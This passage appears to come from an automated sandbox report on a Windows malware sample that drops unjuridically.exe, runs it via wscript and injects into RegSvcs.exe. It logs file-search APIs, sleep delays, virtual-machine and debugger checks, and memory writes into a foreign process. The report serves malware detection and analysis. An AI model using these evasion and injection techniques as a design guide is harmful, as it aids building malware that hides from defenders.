                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_004660DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_004660DD
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_004663F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_004663F9
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0046EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0046EB60
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0046F56F FindFirstFileW,FindClose,2_2_0046F56F
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0046F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_0046F5FA
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00471B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00471B2F
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00471C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00471C8A
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00471F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00471F94
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_0099DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0099DDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599891Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599617Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599516Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599391Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599276Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599051Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598923Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598779Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598672Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598534Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598422Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598312Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598201Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598093Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597984Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597766Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597641Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597531Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597422Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597313Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597188Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597063Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596938Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596718Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596273Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596134Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596031Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595922Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595813Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595688Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595563Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595344Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595109Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594890Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594672Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594563Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594438Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594094Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599633Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599531Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599421Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599312Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599203Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599093Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598984Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598433Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598306Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598203Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598093Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597984Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597874Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597756Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597635Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597531Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597421Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596984Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596818Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596703Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596593Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596265Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596047Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595937Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595718Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595609Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595500Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595390Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595281Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595172Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595062Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594953Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594843Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594734Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594583Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594361Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594234Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594125Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594015Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593906Jump to behavior
                Source: RegSvcs.exe, 00000006.00000002.4495084882.0000000003001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                Source: RegSvcs.exe, 00000006.00000002.4498002788.0000000006369000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*#
                Source: RegSvcs.exe, 00000006.00000002.4495084882.0000000003001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                Source: unjuridically.exe, 00000002.00000002.2067353396.0000000003430000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2198847445.0000000000402000.00000040.80000000.00040000.00000000.sdmp, unjuridically.exe, 00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: hgfsZrw6
                Source: unjuridically.exe, 00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                Source: wscript.exe, 00000004.00000002.2180906390.00000212ABB97000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}P1
                Source: RegSvcs.exe, 00000003.00000002.2208709668.0000000005C70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeAPI call chain: ExitProcess graph end nodegraph_0-95219
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeAPI call chain: ExitProcess graph end nodegraph_0-94155
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeAPI call chain: ExitProcess graph end node
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeAPI call chain: ExitProcess graph end node

                Anti Debugging

                barindex
                Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00DC7070 CheckRemoteDebuggerPresent,3_2_00DC7070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009D6AAF BlockInput,0_2_009D6AAF
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_00983D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00983D19
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009B3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_009B3920
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_0099E01E LoadLibraryA,GetProcAddress,0_2_0099E01E
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_00CAB368 mov eax, dword ptr fs:[00000030h]0_2_00CAB368
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_00CAB308 mov eax, dword ptr fs:[00000030h]0_2_00CAB308
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_00CA9CC8 mov eax, dword ptr fs:[00000030h]0_2_00CA9CC8
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00CAE848 mov eax, dword ptr fs:[00000030h]2_2_00CAE848
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00CAFEE8 mov eax, dword ptr fs:[00000030h]2_2_00CAFEE8
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00CAFE88 mov eax, dword ptr fs:[00000030h]2_2_00CAFE88
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 5_2_016D6278 mov eax, dword ptr fs:[00000030h]5_2_016D6278
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 5_2_016D4BD8 mov eax, dword ptr fs:[00000030h]5_2_016D4BD8
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 5_2_016D6218 mov eax, dword ptr fs:[00000030h]5_2_016D6218
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009BA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_009BA66C
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009A8189 SetUnhandledExceptionFilter,0_2_009A8189
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009A81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009A81AC
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00448189 SetUnhandledExceptionFilter,2_2_00448189
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_004481AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_004481AC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Maps a DLL or memory area into another process
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 80B008Jump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: E1C008Jump to behavior
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009BB106 LogonUserW,0_2_009BB106
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_00983D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00983D19
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009C411C SendInput,keybd_event,0_2_009C411C
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009C74BB mouse_event,0_2_009C74BB
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\RHOqJ5BrHW.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe "C:\Users\user\AppData\Local\Lityerses\unjuridically.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Lityerses\unjuridically.exe" Jump to behavior
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009BA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_009BA66C
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009C71FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_009C71FA
                Source: RHOqJ5BrHW.exe, unjuridically.exeBinary or memory string: Shell_TrayWnd
                Source: RHOqJ5BrHW.exe, unjuridically.exe.0.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009A65C4 cpuid 0_2_009A65C4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009D091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_009D091D
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009FB340 GetUserNameW,0_2_009FB340
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009B1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_009B1E8E
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_0099DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0099DDC0
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: unjuridically.exe, 00000002.00000003.2050370513.0000000000CC7000.00000004.00000020.00020000.00000000.sdmp, unjuridically.exe, 00000002.00000003.2049933715.0000000000C9D000.00000004.00000020.00020000.00000000.sdmp, unjuridically.exe, 00000002.00000003.2051632545.0000000000CC7000.00000004.00000020.00020000.00000000.sdmp, unjuridically.exe, 00000002.00000003.2050434296.0000000000CC7000.00000004.00000020.00020000.00000000.sdmp, unjuridically.exe, 00000002.00000003.2051985401.0000000000CC7000.00000004.00000020.00020000.00000000.sdmp, unjuridically.exe, 00000002.00000003.2065899615.0000000000CC7000.00000004.00000020.00020000.00000000.sdmp, unjuridically.exe, 00000002.00000002.2067133369.0000000000CC7000.00000004.00000020.00020000.00000000.sdmp, unjuridically.exe, 00000002.00000003.2052308758.0000000000CC7000.00000004.00000020.00020000.00000000.sdmp, unjuridically.exe, 00000002.00000003.2051078452.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp, unjuridically.exe, 00000002.00000003.2050962447.0000000000CAD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 